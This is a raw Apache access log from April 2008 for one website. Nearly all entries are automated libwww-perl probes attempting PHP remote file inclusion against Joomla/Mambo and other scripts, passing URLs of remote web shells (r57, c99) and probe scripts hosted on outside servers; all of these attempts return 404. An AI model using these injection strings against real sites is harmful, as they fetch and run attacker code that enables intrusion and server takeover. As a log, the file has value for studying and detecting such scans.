213.215.80.102 - - [06/Apr/2008:18:00:43 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:18:00:44 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:18:01:38 -0700] "GET /logs/access_080121.log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:02:54 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:02:55 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:02:55 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:18:03:33 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:18:03:33 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:18:03:34 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
218.216.120.163 - - [06/Apr/2008:18:05:10 -0700] "GET /logs/access_080303.log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:18:06:37 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:18:06:37 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:18:06:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:18:07:51 -0700] "GET /logs/access_071203.log/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:18:08:06 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.195.37.125 - - [06/Apr/2008:18:08:58 -0700] "GET /logs/access_080128.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
85.226.60.4 - - [06/Apr/2008:18:09:42 -0700] "GET /logs/access_071231.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.142.223.177 - - [06/Apr/2008:18:09:45 -0700] "GET //index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
218.216.120.163 - - [06/Apr/2008:18:10:04 -0700] "GET /logs/access_071224.log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
218.216.120.163 - - [06/Apr/2008:18:10:26 -0700] "GET /logs/access_080204.log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
81.181.16.155 - - [06/Apr/2008:18:11:22 -0700] "GET /logs/access_071112.log HTTP/1.1" 200 227130 "-" "bjnjsbCywy nCvjmxkycm" "www.toulouseangloexchange.com"
80.67.24.32 - - [06/Apr/2008:18:12:37 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.68.228.146 - - [06/Apr/2008:18:13:40 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
207.58.135.90 - - [06/Apr/2008:18:15:35 -0700] "GET /main.php?x=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
207.58.135.90 - - [06/Apr/2008:18:15:35 -0700] "GET /logs/main.php?x=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:03 -0700] "GET /logs/access_080211.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:04 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:04 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:08 -0700] "GET /logs/access_080303.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:08 -0700] "GET /logs/access_080211.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:09 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:10 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:16:14 -0700] "GET /logs/access_080303.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.37.186.93 - - [06/Apr/2008:18:16:32 -0700] "GET /logs/access_080303.log//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.37.186.93 - - [06/Apr/2008:18:16:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.37.186.93 - - [06/Apr/2008:18:16:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:18:17:34 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:18:23 -0700] "GET /index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.89.191.68 - - [06/Apr/2008:18:18:35 -0700] "GET /logs/access_080211.log//modules/My_eGallery/index.php?basepath=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:19:19 -0700] "GET /index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.37.186.93 - - [06/Apr/2008:18:19:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
71.56.213.177 - - [06/Apr/2008:18:20:18 -0700] "GET /logs/access_080128.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
71.56.213.177 - - [06/Apr/2008:18:20:18 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
71.56.213.177 - - [06/Apr/2008:18:20:19 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
71.56.213.177 - - [06/Apr/2008:18:20:25 -0700] "GET /logs/access_080107.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:20:39 -0700] "GET /logs/access_071022.log/index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:20:39 -0700] "GET /logs/index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:20:46 -0700] "GET /logs/access_071210.log/index.php?body=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
71.56.213.177 - - [06/Apr/2008:18:21:54 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:22:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:22:08 -0700] "GET //ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:22:08 -0700] "GET /logs//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:22:19 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:22:19 -0700] "GET //ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:22:20 -0700] "GET /logs//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:18:22:25 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:23:17 -0700] "GET /logs/access_080225.log///faqsupport/samplefaqsupport.php?path[docroot]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:23:18 -0700] "GET ///faqsupport/samplefaqsupport.php?path[docroot]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:23:18 -0700] "GET /logs///faqsupport/samplefaqsupport.php?path[docroot]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:23:45 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.120.27.17 - - [06/Apr/2008:18:23:47 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://nikyr0x.altervista.org/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:24:10 -0700] "GET /logs/access_080303.log///faqsupport/samplefaqsupport.php?path[docroot]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.195.37.125 - - [06/Apr/2008:18:24:17 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
83.68.228.146 - - [06/Apr/2008:18:24:27 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.68.228.146 - - [06/Apr/2008:18:24:27 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.68.228.146 - - [06/Apr/2008:18:24:27 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:18:24:30 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.68.228.146 - - [06/Apr/2008:18:24:52 -0700] "GET /logs/access_071203.log/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:18:26:01 -0700] "GET /logs/access_080211.log/principal.php?conteudo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:18:26:01 -0700] "GET /principal.php?conteudo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:18:26:04 -0700] "GET /logs/principal.php?conteudo=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:18:26:40 -0700] "GET /logs/access_080128.log/index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:18:26:40 -0700] "GET /index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:18:26:40 -0700] "GET /logs/index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:18:26:57 -0700] "GET /logs/access_080225.log/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:18:26:57 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:18:26:58 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.67.24.32 - - [06/Apr/2008:18:28:10 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.24.32 - - [06/Apr/2008:18:28:11 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.24.32 - - [06/Apr/2008:18:28:11 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.67.24.32 - - [06/Apr/2008:18:28:31 -0700] "GET /logs/access_071203.log/admincp/auth/checklogin.php?cfgProgDir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.191.104.52 - - [06/Apr/2008:18:31:51 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.208.231.141 - - [06/Apr/2008:18:31:56 -0700] "GET /logs/access_080204.log/modules/My_eGallery/public/displayCategory.php?basepath=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:32:20 -0700] "GET /logs/access_080121.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:32:21 -0700] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:32:21 -0700] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:32:37 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:32:37 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:32:37 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:18:32:40 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:32:42 -0700] "GET /logs/access_071119.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.207.204.13 - - [06/Apr/2008:18:33:33 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [06/Apr/2008:18:33:33 -0700] "GET //ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [06/Apr/2008:18:33:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [06/Apr/2008:18:33:54 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:34:26 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:34:27 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:34:27 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:34:31 -0700] "GET /logs/access_080121.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:34:31 -0700] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:34:31 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.108.66.169 - - [06/Apr/2008:18:34:31 -0700] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:34:32 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.120.225.104 - - [06/Apr/2008:18:34:32 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
